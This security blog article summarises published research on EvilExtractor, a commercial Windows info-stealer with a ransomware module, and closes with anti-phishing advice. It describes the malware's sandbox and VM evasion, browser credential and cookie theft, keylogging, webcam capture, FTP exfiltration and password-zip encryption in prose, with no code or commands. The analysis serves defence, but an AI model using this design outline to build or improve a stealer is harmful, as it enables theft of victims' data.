EvilExtractor is an info stealer malware tool designed for data theft attacks on Windows operating systems. Researchers at Fortinet’s threat research group FortiGuard Labs have published an analysis of this tool detailing the attack method for this malware, and its impact on its victims. The research concluded that although there are no specific industries targeted by this attack tool, most of the victims of this malware have been located in Europe and America. A key feature of this tool is the fact it has been marketed online both masquerading as a legitimate ‘educational tool’, and through promotion to threat actors on known hacking forums. This info stealer malware contains ransomware, credential extraction, and Windows Defender bypassing functionalities, and has been found to be actively used by cybercriminals in attacks. 

 

The NCSC (National Cyber Security Centre), a branch of GCHQ, have recently published the report “The threat from commercial cyber proliferation” which concluded that  

“Commercial cyber tools and services lower the barrier to entry to state and non-state actors in obtaining cost-effective capability and intelligence they would not otherwise be able to develop or acquire themselves. This commercial proliferation will almost certainly be transformational on the cyber landscape.”  

 

In the case of EvilExtractor malware this is even more likely to be true, as the creator company Kodex continue to claim it is an educational tool, and therefore was able to market it as a legitimate tool despite its functionality as attack software. It can even be located through Google searches due to this claim, where the website description states “Evil Extractor is an attack software developed by Kodex for Windows-based operating systems. It offers two modes of operation: Single Bullet and RAT” and links to a now unavailable site, evilextractor[.]com.  

 

The attacks conducted in the wild using EvilExtractor begin with a phishing email that appeared like an account confirmation request. This email contains an attachment of a gzip-compressed executable file, that is disguised as a legitimate attachment through the use of the Adobe PDF icon image within the email. This attachment contains a Python program with the obfuscating PYARMOR string within its main code, used to make the malware harder to detect or analyse. A .NET loader was also found by researchers alongside this Python program that could be used to extract the EvilExtractor PowerShell script. The tool PS2EXE-GUI was used to generate the execution file, by converting PowerShell scripts to .EXE executable files. 

 

The EvilExtractor PowerShell script contains 7 modules: Date time checking, Anti-Sandbox, Anti-VM, Anti-Scanner, FTP server setting, Steal data, Upload Stolen data, and Clear log. Before beginning malicious actions, the EvilExtractor script checks the system’s date to see if it is between 2022-11-09 and 2023-04-12. This, along with a check for the product model to see if it matches any known virtual machine products, and a hostname check against a list of VirusTotal, scanner, or virtual machines, are used by the program to determine whether or not it is running in a sandbox or a virtual environment. If the system does not match the set of requirements specified in the script for the attack to continue then it deletes the data within the PSReadline and terminates. 

 

If the conditions for the attack to continue are satisfied, the EvilExtractor downloads three additional components from an identified source IP, which are Python programs obfuscated with PyArmor, used for data stealing. The first file is KK2023.zip which can extract cookies from Google Chrome, Microsoft Edge, Opera, and Firefox browsers, and steal browser history data and passwords from a range of browsers including Google Chrome and Microsoft Edge. The stolen browser data is then saved into the folder IMP_Data. The second file Confirm.zip is a keylogger that is deployed on the victim’s machine and saves the data it collects from keyboard inputs into the folder KeyLogs. The third file is MnMs.zip which is a webcam extractor that can activate the webcam on the machine to capture video or images.  

 

System information is also collected via a PowerShell script and stored in the text file Credentials.txt. other files located in the Desktop and Download folders are also selected for exfiltration based on their file extension. Some of the extensions included in this data gathering process are jpg, png, jpeg, mp4, mpeg, mp3, avi, txt, rtf, xlsx, docx, pptx, pdf, rar, zip, 7z, csv, xml, and html. The command CopyFromScreen is also used for further data gathering, which causes a screenshot of the machine to be taken. Once all the data has been gathered and saved, it is uploaded to an FTP server controlled by the attacker. This server is a part of the service offered by the sellers of EvilExtractor when they market their malware. 

 

The original EvilExtractor .NET loader from the Python program in the phishing email also contains a ransomware function, called Kodex Ransomware. This is another PowerShell script which downloads a file from evilextractor[.]com called zzyy.zip. This is a 7-zip standalone console file that encrypts files using an executable called 7za.exe. Files are encrypted by zipping them with a password, which is enacted through the parameter -p in this executable. A ransom note is also produced to inform the victims of the file encryption that has taken place and demand payment in BTC before a decryption key will be released. The ransom message generated also contains a timer that counts down to a limit set by the attackers to add pressure to the victims, claiming that once the timer expires they will not ever be able to access their encrypted files again. 

 

Since its first appearance in October 2022, EvilExctractor malware and ransomware has had many additional malicious features added by the developer, and it continues to be a threat, with attacks using this tool peaking last month in March 2023. Having an antivirus or endpoint detection and prevention system on your devices that can efficiently block malicious URLs in real time can help protect your devices from these sorts of commercial attack tools. A list of indicators of compromise including known URLs and IPs associated with this attack tool can be found in FortiGuard Lab’s analysis blog post.  

 

However, with the commercial proliferation and the constant evolution of these attack tools and their capabilities, the best way to prevent falling victim to these attacks is not by blocking the URLs and IPs involved (which can change quickly), but by preventing them from being installed on your device in the first place, through vigilant checking of emails for potential phishing attempts. Education of staff to spot and alert IT security teams about potential phishing emails is an essential form of protection for your network alongside the technical controls offered by next generation firewalls and endpoint protection software.